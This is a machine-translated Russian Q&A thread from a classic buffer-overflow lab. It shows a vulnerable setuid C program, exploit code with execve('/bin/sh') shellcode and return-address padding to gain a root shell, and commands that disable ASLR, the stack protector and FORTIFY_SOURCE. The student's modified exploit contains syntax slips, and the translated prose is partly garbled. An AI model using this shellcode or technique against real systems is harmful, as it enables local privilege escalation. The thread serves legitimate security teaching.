1. дома
  2. Вопрос и ответ
  3. Проблемы с уязвимостью переполнения буфера

Проблемы с уязвимостью переполнения буфера

2013-02-16 2 views
1

У меня есть назначение лаборатории, на которое я застрял. В принципе, я должен использовать переполнение буфера для создания оболочки с привилегиями root. Я должен использовать 2 отдельных файла .c. Вот первый один: stack.cПроблемы с уязвимостью переполнения буфера

#include <stdlib.h> 
#include <stdio.h> 
#include <string.h> 
int bof(char *str) 
{ 
    char buffer[12]; 

    //BO Vulnerability 
    strcpy(buffer,str); 

    return 1; 
} 

int main(int argc, char* argv[]) 
{ 
    char str[517]; 

    FILE *badfile; 
    badfile = fopen("badfile","r"); 

    fread(str, sizeof(char),517, badfile); 
    bof(str); 

    printf("Returned Properly\n"); 
    return 1; 
}

Вот второй один: exploit.c

#include <stdlib.h> 
#include <stdio.h> 
#include <string.h> 
char shellcode[]= 
"\x31\xc0"    /* xorl %eax,%eax    */ 
"\x50"     /* pushl %eax     */ 
"\x68""//sh"   /* pushl $0x68732f2f   */ 
"\x68""/bin"   /* pushl $0x6e69622f   */ 
"\x89\xe3"    /* movl %esp,%ebx    */ 
"\x50"     /* pushl %eax     */ 
"\x53"     /* pushl %ebx     */ 
"\x89\xe1"    /* movl %esp,%ecx    */ 
"\x99"     /* cdql       */ 
"\xb0\x0b"    /* movb $0x0b,%al    */  
"\xcd\x80"    /* int  $0x80     */ 
; 
void main(int argc, char **argv) 
{ 
    char buffer[517]; 
    FILE *badfile; 
    /* Initialize buffer with 0x90 (NOP instruction) */ 
    memset(&buffer, 0x90, 517); 
/* You need to fill the buffer with appropriate contents here */ 
/* Save the contents to the file "badfile" */ 
    badfile = fopen("./badfile", "w"); 
    fwrite(buffer, 517, 1, badfile); 
    fclose(badfile); 
}

я могу изменить только второй. Вот изменения, которые я сделал:

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#define DEFAULT_OFFSET 350 

char shellcode[]= 
"\x31\xc0"    /* xorl %eax,%eax    */ 
"\x50"     /* pushl %eax     */ 
"\x68""//sh"   /* pushl $0x68732f2f   */ 
"\x68""/bin"   /* pushl $0x6e69622f   */ 
"\x89\xe3"    /* movl %esp,%ebx    */ 
"\x50"     /* pushl %eax     */ 
"\x53"     /* pushl %ebx     */ 
"\x89\xe1"    /* movl %esp,%ecx    */ 
"\x99"     /* cdql       */ 
"\xb0\x0b"    /* movb $0x0b,%al    */  
"\xcd\x80"    /* int  $0x80     */ 

unsigned long get_sp(void) 
{ 
    __asm__("movl %esp,%eax"); 
} 

void main(int argc, char **argv) 
{ 
    char buffer[517]; 
    FILE *badfile; 
    char *ptr; 
    long *a_ptr,ret; 

    int offset = DEFAULT_OFFSET; 
    int codeSize = sizeof(shellcode); 
    int buffSize = sizeof(buffer); 

    if(argc > 1) offset = atoi(argv[1]); //allows for command line input 

    ptr=buffer; 
    a_ptr = (long *) ptr; 

    /* Initialize buffer with 0x90 (NOP instruction) */ 
    memset(buffer, 0x90, buffSize); 

//----------------------BEGIN FILL BUFFER----------------------\\ 

    ret = get_sp()+offset; 
    printf("Return Address: 0x%x\n",get_sp()); 
    printf("Address: 0x%x\n",ret); 

    ptr = buffer; 
    a_ptr = (long *) ptr; 

    int i; 
    for (i = 0; i < 300;i+=4) 
    { 
     *(a_ptr++) = ret; 
    } 

    for(i = 486;i < codeSize + 486;++i) 
    { 
     buffer[i] = shellcode[i-486]; 
    { 
    buffer[buffSize - 1] = '\0'; 
//-----------------------END FILL BUFFER-----------------------\\ 


/* Save the contents to the file "badfile" */ 
    badfile = fopen("./badfile", "w"); 
    fwrite(buffer,517,1,badfile); 
    fclose(badfile);  
}

Затем я выполнил следующие из командной строки

$ su root 
$ Password (enter root password) 
# gcc -o stack -fno-stack-protector stack.c 
# chmod 4755 stack 
# exit 
$ gcc -o exploit exploit.c 
$./exploit 
$./stack

Однако, в то время как это делает генерировать «badfile» с фактическими данными и оболочкой, сказал только оболочка имеет основные пользовательские привилегии. Заблаговременно, я выполнить следующие действия в корне:

echo 0 > /proc/sys/kernel/randomize_va_space

Лаборатория говорит, что вместо того, необходимо выполнить следующие действия в корне:

sysctl -w kernel.randomize_va_space=0

Однако, если я могу это сделать, а затем, когда я выполняю «стек ", Я получаю ошибку" незаконной инструкции ". Может ли кто-нибудь помочь мне с этим?

источник

2013-02-16 user1991682

+1

Вы проверили, что скомпилированный файл стека принадлежит root? – Michael

+1

http://stackoverflow.com/q/14903394/905902 Точный дубликат (в том числе глупый void main() ...) – wildplasser

ответ

2

Я понял, в чем проблема. Мне нужно было связать zsh с/bin/bash /. Я пропустил это, потому что думал, что я должен был это сделать, если бы использовал Fedora. Я использовал Ubuntu.

источник

2013-02-17 23:09:40 user1991682

+0

Я знаю, что это старый, но если вы все еще вокруг, можете ли вы объяснить, что __asm ​​__ ("movl% особ,% е "); делает и как это всегда работает? –

0 
strcpy(buffer, str);

Одна из вещей, которые нужно будет решить в ходе тестирования этот вызов функции.

FORTIFY_SOURCE использует «безопасные» варианты функций высокого риска, таких как memcpy и strcpy. Компилятор использует более безопасные варианты, когда он может определить размер буфера назначения. Если копия превысит размер буфера назначения, тогда программа вызывает abort().

Чтобы отключить FORTIFY_SOURCE для тестирования, вы должны скомпилировать программу с помощью -U_FORTIFY_SOURCE или -D_FORTIFY_SOURCE=0.

источник

2014-09-12 13:14:43 jww

Смежные вопросы

 Смежные вопросы